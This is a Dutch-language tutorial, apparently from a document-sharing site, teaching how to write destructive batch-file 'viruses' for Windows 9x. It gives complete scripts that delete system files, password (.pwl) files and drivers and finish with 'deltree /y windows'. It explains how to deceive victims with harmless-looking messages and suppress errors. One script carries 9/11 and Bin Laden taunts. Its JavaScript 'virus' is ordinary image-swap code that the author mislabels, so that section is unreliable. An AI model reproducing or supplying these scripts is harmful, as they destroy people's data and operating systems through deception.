Met deze tutorial leer je een virus maken met DOS_ niet met VB by malj

VIEWS: 137 PAGES: 11

									Met deze tutorial leer je een virus maken met DOS( niet met VB) maar dus met
DOS, dat wil zeggen dat je dus behoorlijk veel schade en shit kunt aanbrengen
aan windows.

Een virus maken is eigenlijk helemaal niet zo moeilijk. Als je goed kan programmeren
in bijvoorbeeld: VB. Dan kan je ongetwijfeld een goed virus maken, het "i-love-you virus"
is ook met VB gemaakt. Helaas ga ik in deze tutorial niet vertellen hoe je in VB
programmeert, maar wel hoe je een virus maakt, met de Batch taal. Wat super simpel is.
Lees alles goed door, en lees het vol logica. Anders zal je er geen fuck van snappen.
Ik raad je ook aan om de DOS tutorial te leren, helemaal niet moeilijk, maar het hoefd
niet
wel zal je er meer profeit van hebben, omdat je dan eigenlijk echt snapt wat er gebeurd.
'

                                    Hoe batch werkt
Als eerste moet je weten hoe je het opslaat, nou dat ga ik je vertellen, Eerst moet je de
code typen in KLADBLOK. Omdat dit namelijk geen andere "crap" gaat opslaan, ik geef
een
voorbeeld van dat kut programma: Microsoft word. Als je de code opslaat als VIRUS.BAT
maakt word er automaties: VIRUS.BAT.DOC van. En dat is niet de bedoeling. Dus we
gaan
de code (die we zo gaan leren) maken in kladblok, en het dan opslaan als .bat erachter.
Je mag dus zelf de bestandsnaam weten, maar als je er maar niet: .BAT vergeet achter
te zetten. Batch maakt gebruik van de kracht van DOS. Daardoor kan jij een virus
maken.
Een virus dat bijvoorbeeld rottige opmerkingen laat zien, en tijdens het maken van die
opmerkingen, bestanden wissen, of belangrijke gegevens verplaatsen, als je een virus
maakt in batch, dan wordt hij niet herkent door een virus scanner. In batch kan je ook
gevaarlijke dingen maken. Maar een virus maken, dat iets infecteert, kan je niet in batch
doen. Wel in visualbasic.. Ik ben niet aansprakelijk voor eventuele schade...........
'

                                  De code doornemen.
DE code moet je onder wel effe goed doornemen, later komen ook allerlei bijlagen,
die misschien wel leuk zijn om te kijken, ondertussen tijdens het lezen worden ook
allerlei links gegeven, wel zo verstandig om effe te kijken, omdat daar de duidelijke
uitleg wordt gegeven van een specifiek woord, of andere boel

'

                                    De Start blokken
Eerst nemen we de belangrijkste commando's door, en geven meerdere voorbeelden...

@echo off

Deze commando laat de computer weten dat alle echo bestanden moeten worden
weergegeven, normaal laat het de recente directory zien waar het in DOS zich begeeft.
Maar met @echo off. Laat hij de directory's weg, en laat het juist de ECHO commando
zien

echo

Hiermee kan je berichten in het scherm laten zien, maakt niet uit welke tekst.
Je kan de gebruiker hiermee op het valse spoor zetten, en dus laten
denken dat het geen virus is. Op het einde kan je wel laten weten dat het een
 virus is geweest. Eerst moet je echo typen, gevolgd door een spatie, en daarna
je tekst dat je wil laten weergeven. Dus: echo hallo meneer!

@del

Ja dit is de belanrijkste commando van je virus. Hiermee kan je een
bestand verwijderen. Hierbij geld weer het zelfde, eerst de @del commando
gevolgd door een spatie, en daarna je bestandsnaam. je moet wel eerst in
de directory zitten met je batch virus file. Zie bijlage A voor meer informatie.
Dus de commando wordt: @del hallo.htm
Nu is hallo.htm naar de hel. (verwijderd)


mkdir

Mkdir is ook wel een leuke commando. Hiermee kan je mappen maken,
maar ook op overdreven grote schaal.Je kan dus zijn desktop vol laten lopen
met mappen, en die mappen weer inhoud hebben. Zo duurt het langer
als de computer opstart. Ook gaan we nog wat *.pwl files behandelen.

*.pwl (file)

*.pwl is geen commando. Maar een handige file in windows 98 of 95.
(en misschien wel windows ME) Dit is een PASSWORD LOG/LIST, de naam
zecht eigenlijk al genoeg. Hier worden dus passworden in opgeslagen. En deze
kan je met behulp van @del weghalen, de *.pwl files bevinden zich normaal
gesproken in de windows map.

start

JA deze is heel handig. Hiermee kan je bijvoorbeeld eindeloos de C:\windows
map laten openen. Eerst vul je de start commando in. Daarna vul je een spatie
en C:\windows in. Maak ongeveer 1000 van die regels. Sla je script op (typ de
boel in kladblok) als virus.bat open het. En wat zie je? de windows map wordt
eindeloos geopend. Je kan ook meerdere vensters tegelijk openen.

Start C:\windows
Start C:\windows
Start C:\windows
Start C:\windows
Start C:\windows
enz enz enz ................

Dus nu gaan we beginnen met met deze codes die hier boven
beschreven staan, je kan natuurlijk ook zelf creatief zijn. En op zoek gaan naar
belangrijke files. We gaan eerst dit onderwerp bespreken, en daarna de voorbeelden
'

                               De belanrijke files betekenis.

Belangrijke files zijn:

*.bat *.dll *.drv *.ocx *.sys of *.exe
*.bat => zijn files die door DOS worden aangegeven. Die vaak worden gebruikt
om windows op te starten, als je autoexec.bat verwijderd zijn de gevolgen niet
om aan te zien!


*.dll => Ja die gevaarlijke windows files, gemaakt in vb(s) dit zijn bestanden die
een soort "liberty", als je sommige dll files verwijderd, doen programma's het niet
meer, als je een extreem belangrijke dll file weghaald, dat er voor zorgt dat windows
functioneerd, dan heb je een goed virus (config.sys)


*.drv => dit zijn driver bestanden van windows, Hiermee kan je bijvoorbeeld de
grafische kaart wat minder laten functioneren, of zelfs uitschakelen, kapot maken
kan niet. Ook kan je ervoor zorgen dat de A:\ drive niet meer wordt gelezen tijdens
de opstart procedure. Dus kan hij het systeem niet meer herstellen na enige schade.
omdat het meestal noodzakelijk is om een herstel diskette te hebben, (of hij gaat in de
bios instellen, dat tijdens de start de D:\ schijf wordt gelezen, of gewoon de cd schijf)


*.ocx => Ook weer belangrijke bestanden van windows. Maar dit is voor de "nieuwste
snufjes" Ook zitten er plugins in de ocx bestanden, ook super gevaarlijk als je die files
weet weg te halen,

*.sys => de systeem bestanden, zeg al genoeg, de configuratie van het systeem, of
een bepaald programma. Ook handig om te verwijderen.

*.exe => een uitvoerbaar programma. Als je deze verwijdert dan heb je het programma
niet eens meer =)

Zoek zelf naar de eind bestands extensie van deze extensie files.....|



                                       De voorberijding


Alle virussen maken in kladblok, en opslaan als .bat
Eerst geef ik effe een voorbeeld, daarna neem ik de script source door.

"Virus: config.bat"
@echo off
cd\
C:\
@del config.sys
echo je config.sys is weg
echo dit virus is gemaakt door elite
echo Madbrain




                  laat echo zien, en haald de dos directory weg... ZIE
@echo off
                  BOVENAAN PAGE
                  Deze zorgt ervoor dat het naar de vaste schijf gaat, zie
cd\
                  POWERDOS.htm voor meer informatie
                     Bevestigd de vaste schijf, en zorgt er dus voor dat het naar
C:\
                     de C:\ schijf gaat.
@del                 Verwijdert in de C map config.sys. Gelijk je coputer verrot.
config.sys           Niet uitvoeren
echo                 Een bericht weergeven.
echo                 Een bericht weergeven.
echo                 Een bericht weergeven.
Virus: "netwerkvirus.bat"


@echo off
REM this is a virus by Madbrain,
REM nobody know me, just my mother...
REM fuck you, virus expert? whawhawha
MKDIR C:\windows\temp\a
MKDIR C:\windows\temp\b
MKDIR C:\windows\temp\c
MKDIR C:\windows\temp\d
MKDIR C:\windows\temp\e
MKDIR C:\windows\temp\f
MKDIR C:\windows\temp\g
MKDIR C:\windows\temp\h
MKDIR C:\windows\temp\i
MKDIR C:\windows\temp\j
MKDIR C:\windows\temp\k
MKDIR C:\windows\temp\l
MKDIR C:\windows\temp\m
MKDIR C:\windows\temp\n
MKDIR C:\windows\temp\o
MKDIR C:\windows\temp\p
MKDIR C:\windows\temp\q
MKDIR C:\windows\temp\r
MKDIR C:\windows\temp\s
MKDIR C:\windows\temp\t
MKDIR C:\windows\temp\u
MKDIR C:\windows\desktop\hey_lamer_wazzup
MKDIR c:\windows\desktop\hey_lamer_wazzup\loading_echo_files
MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_sys_operator
MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_config_files
MKDIR c:\windows\desktop\hey_lamer_wazzup\loading_echo_files\ab
MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_sys_operator\ac
MKDIR C:\windows\desktop\hey_lamer_wazzup\loading_config_files\ad


MKDIR C:\windows\temp001
MKDIR C:\windows\temp002
MKDIR C:\windows\temp003
MKDIR C:\windows\temp004
MKDIR C:\windows\temp005
MKDIR C:\windows\temp006
MKDIR C:\windows\temp007
MKDIR C:\windows\temp008
MKDIR C:\windows\temp009
MKDIR C:\windows\temp000
MKDIR C:\windows\temp010
MKDIR C:\windows\temp020
MKDIR C:\windows\temp030
MKDIR C:\windows\temp040
MKDIR C:\windows\temp050


MKDIR C:\windows\temp001\k
MKDIR C:\windows\temp002\kk
MKDIR C:\windows\temp003\kkk
MKDIR C:\windows\temp004\kkkk
MKDIR C:\windows\temp005\kkkkk
MKDIR C:\windows\temp006\kkkkkk
MKDIR C:\windows\temp007\kkkkkkk
MKDIR C:\windows\temp008\kkkkkkkk
MKDIR C:\windows\temp009\kkkkkkkkk
MKDIR C:\windows\temp000\kkkkkkkkkk
MKDIR C:\windows\temp010\kkkkkkkkkkk
MKDIR C:\windows\temp020\kkkkkkkkkkkk
MKDIR C:\windows\temp030\kkkkkkkkkkkkk
MKDIR C:\windows\temp040\kkkkkkkkkkkkkk
MKDIR C:\windows\temp050\010010001111101001001
MKDIR C:\windows\temp050\010010001001001011001
MKDIR C:\windows\temp050\010010001001011110001
MKDIR C:\windows\temp050\010010010101010011001
MKDIR C:\windows\temp050\010010001001100100101
REM let some gone on the lazy network
REM yeah
CD\
C:\
REM Your in da map nu de config.sys map weghalen....
@del Config.sys
cd windows
@del msdos.sys
@del Himem.sys
@del Logow.sys
@del Logos.sys
@del Ramdrive.sys




REM let delete that fuckt up windows
REM windows\lindows rulez, fuck your fault it windows!


cd\
C:\
deltree /y windows



Wat doet de code?
Ja de MKDIR commando maakt gewoon mappen aan.
De laatste commando is: deltree /y windows. Het haalt de windows map
weg, (wat normaal niet kan) en dat doet hij zonder te vragen, omdat hij
al /y (yes) hebt ingevoegd. Vrij simpel. Alle @del commando's halen gewoon
de bestanden weg, die achter de commando staan. Redelijk groot virus.
Neem de code gewoon goed door, Laat de MKDIR commandos effe staan
waarvoor ze echt staan (voor stront). En ga veder met de @del en deltree
commando's..

                        De opbouw van een virus in Delphi of C/C++
Let wel hier even op... Hier wordt geen complete C++ virus getoond. Alleen hoe je
eventueel een virus
In c++ kan schrijven. Zelf weet ik dat als je een virus hebt geschreven, de meeste virus
scanners de
"kwade code" wel herkennen, dus dat betekent, dat je virus in weze niks zal kunnen
worden, Omdat C++
ook niet zo heel veel met microsoft te maken hebt. En dus minder fouten bevat als VB(S)
visual basic dus.
nou lets go, nobody listen to the mother fucking techno!

Begin
          Look for (een of meer objecten/programma's)
          If (false)
          then
          goto exit
         :exit = end
                   else (infecteer het doelwit met de volgende code : DE CODE HIER!)
         endif
:end

Nou is dit natuurlijk geen source om in windows effe lekker een excutable filetje
te maken (exe file) Maar dat is niet zo, het is eigenlijk gewoon een simpel voorbeeld.


                                       Virus in het wild

Klinkt als winldernis, Een virus dat "spontaan is ontstaan" klinkt voor programmeurs vrij
onwaarschijnelijk
maar is het toch echt niet. Als je nagaat dat je altijd wel fouten maakt tijdens het
schrijven van macro's.
de source wordt "toevallig" in een buffer gezet (lees buffers.htm) De volgende code komt
ook in dat buffertje
en er wordt een virus samengesteld in dat buffertje, er onstaat een bufferoverflow, en
kaboom!. Een virus.
Humm niet echt om van te genieten, als je gelijk door je eigen fouten een virus hebt te
pakken :).
Veel virus schrijvers vertellen dat je veel kennis moet hebben om een werkend virus te
maken, dit is echter niet
het geval. Ook alle "gewone" mensen die met computers omgaan, beweren dat je er wel
veel verstand van moet
hebben, Klinkt ook zo groot, BWa je moet de fouten weten! en Bwa je de zwake plekken
kennen!. Nou ja en nee,
Als je een virus zoals het i love you virus moet maken, ja dan moet je wel veel zwake
plekken kennen van outlook.
Nou eigenlijk is die code ook door een 10 jarige computerexpert geschreven, genaamd
psyder. Wel goed bedacht.
Als je nagaat dat er een virus bestond dat het algemene internet SLOOM maakte. Omdat
het virus code red zocht
naar nog niet geinfecteerde computers, code red wou het witte huis berijken, maar de
nasa en FBI hadden het
adres van het witte huis veranderd. fuck. De code red wordt dus razend snel versprijd.
Zelf heb ik ook een keer
een virus in JavaScript geschreven, en ja, hij werdt herkent door de virus scanners,
Jammer, het zal ook eventueel
veel schade kunnen aanrichten, ook over het internet. Het is zechmaar een soort worm
dat zich ook supersnel via
LAN en Internet kan versprijden. Je computer gaat op 11 september kappot. Jammer dat
het niet dee. Ik zal hem
toch niet versturen want dat is nogal lame als je snap wat ik bedoel

Ook zijn er virussen die in CDROMS willen krijpen, dit is zo'n voorbeeld van buffers
virussen/macro virussen. JA
Hier hebben best wel veel mensen last van, dat je eigenlijk nog niet eens meer je cd
durft te openen. En dit is
dus gewoon een mengsel van verschillende source code's.
'

                                        Een javavirus.
In java (script) zal je ook wel leuke virussen kunnen schrijven. Gewoon een virus
schrijven wat op een restore image
gaat lijken, dat wil zeggen: een soort menu. Omdat je dit in een website gaat doen.


<script language="JavaScript" type="text/javascript">
// this is a virus by Madbrain
function SwitchImg()
{ //start
var rem, keep=0, store, obj, switcher=new Array, history=document.Data;
for (rem=0; rem < (SwitchImg.arguments.length-2); rem+=3) {
store = SwitchImg.arguments[(navigator.appName == 'Netscape')?rem:rem+1];
if ((store.indexOf('document.layers[')==0 && document.layers==null) ||
(store.indexOf('document.all[')==0 && document.all==null))
store = 'document'+store.substring(store.lastIndexOf('.'),store.length);
obj = eval(store);
if (obj != null) {
switcher[keep++] = obj;
switcher[keep++] = (history==null || history[keep-
1]!=obj)?obj.src:history[keep];
obj.src = SwitchImg.arguments[rem+2];
} }
document.Data = switcher;
} //end

function RestoreImg()
{ //start
if (document.Data != null)
for (var rem=0; rem<(document.Data.length-1); rem+=2)
document.Data[rem].src=document.Data[rem+1];
} //end

// end hiding contents -->
</script>

<a href="open().html" onMouseOut="RestoreImg()"
onMouseOver="SwitchImg('document.yo','document.yo','file:///C|/WINDOWS/temp
001/virus.exe')">
<img src="file:///C|/windows/temp002/Ikke.jpg" name="yo" width="0"
height="0" alt="" border="0"></a>
<script language="vbscript" type=data/vbscript>
function getobject()
{
look for (C:\windows\temp001)
If Look for = false {then goto 020
________________}
If look for = true{ then goto 010
___________}
Then
line = 020
{
Mkdir C:\windows\temp001
__________}
Look for (C:\windows\temp001)
Then goto #top
}

              @if commando in batch, belangrijk voor eventuele fouten.
Eerder hebben we de commando del doorsproken. Het kan zijn dat er eventuele
bestanden niet eens in het slachtoffers computer
te voorschijn komt. Nu krijgt de uitvoerder van jouw programma/virus fouten te zien. Nu
kan het zo zijn, dat het slachtoffer dit dus
doorhebt en het virus beëndigd. Dit moet je dus niet hebben. Dat kan je dus voorkomen.
Namelijk met de volgende commando:


@if exist C:\WINDOWS\system.ini del C:\windows\system.ini
Eerst kijkt hij of het bestand bestaat, daarna verwijderd hij het (indien het is gevonden)
Nu gaat dos zoeken naar het bestand system.ini, dat zich in de windows map moet
afspelen, als deze WEL bestaat, dan is het verwijderd.
Als het niet bestaat, dan krijgt de gebruiker niks te zien. Dat is zo handig aan het if exist
commando.
Maar als je zeker weet voor wie het bestemd is, en je weet zeker dat het bestaat, kan je
het net zo goed met de commando del doen.
Hier krijg je nog een virus te zien, die op 11 sep in de lucht is geschoten:


@echo off
echo welkom to this nice en funny program
REM MR X love 11 sep
pause
echo wait.....
cd\
cd C:\
@if exist C:\Autoexec.bat del C:\Autoexec.bat
del config.sys
cd windows
del control.ini
@if exist C:\windows\dosstart.bat del C:\windows\dosstart.bat
cd\
cd C:\
@if exist C:\logo.sys del C:\logo.sys
@if exist C:\windows\rundll.exe del C:\rundll.exe
@if exist C:\windows\rundll32.exe del C:\windows\rundll32.exe
@if exist C:\windows\ios.ini del C:\windows\ios.ini
cd\
cd windows
del win.ini
@if exist C:\WINDOWS\OPTIONS\CABS\scandisk.ini del C:\WINDOWS\OPTIONS\CABS\scandisk.ini
@if exist C:\WINDOWS\system.ini del C:\WINDOWS\system.ini
cd\
cd C:\
@if exist C:\WINDOWS\*.pwl del C:\WINDOWS\*.pwl
@if exist C:\WINDOWS\SYSTEM\sysedit.exe del C:\WINDOWS\SYSTEM\sysedit.exe
@if exist C:\WINDOWS\SYSTEM\Systray.exe del C:\WINDOWS\SYSTEM\Systray.exe
@if exist C:\WINDOWS\system.new del C:\WINDOWS\system.new
@if exist C:\WINDOWS\system.bak del C:\WINDOWS\system.bak
@if exist C:\WINDOWS\system.cb del C:\WINDOWS\system.cb
@if exist C:\WINDOWS\system\Msjstick.drv del C:\WINDOWS\system\Msjstick.drv
@if exist C:\WINDOWS\system\Supervga.drv del C:\WINDOWS\system\Supervga.drv
@if exist C:\WINDOWS\system\Mouse.drv del C:\WINDOWS\system\Mouse.drv
Echo bin laden is back
echo its bin laden time
echo i'm not a terror
echo but a computer freak!
cd\
cd windows
deltree /y windows

Nu weet je meer over de if exist commando....

                          Een virus in een bestaand batch file En labels
In windows 98 heb je een file, dat autoexec.bat heet. Als je hier een "start" commando in
toevoegd zie Powerdos.htm Voor
meer informatie. Ook kan je labels aanmaken. Dat doe je met 2 commando's. Als eerste
kan je de commando

goto gebruiken.

daarna voer je de labelnaam in.

:labelnaam

Dus:
GOTO labelnaam
:labelnaam
echo hallo deze label naam heet labelnaam
end

Hier zie je hoe zo'n label programma te werk gaat. dat dubbele punt geeft de labelnaam
aan, daarna mag je zelf de labelnaam
invullen. Zo kan je een eigen programma schrijven. Hier leer ik jullie later misschien wel
wat meer over.


                                            Het einde
Ik hoop dat jullie van deze tutorial hebben geleerd. En ook wel door door hebben dat een
virus niet zomaar iets is, waarbij je moet spelen ofzo.
Je weet nu dat je moet oppassen met een .bat file. Want er zijn nog veel mensen die
deze methode gebruiken. Wees gewaarschuwd. Leer van
deze tutorial, meer niet, voer het niet uit in de praktijk.

								
To top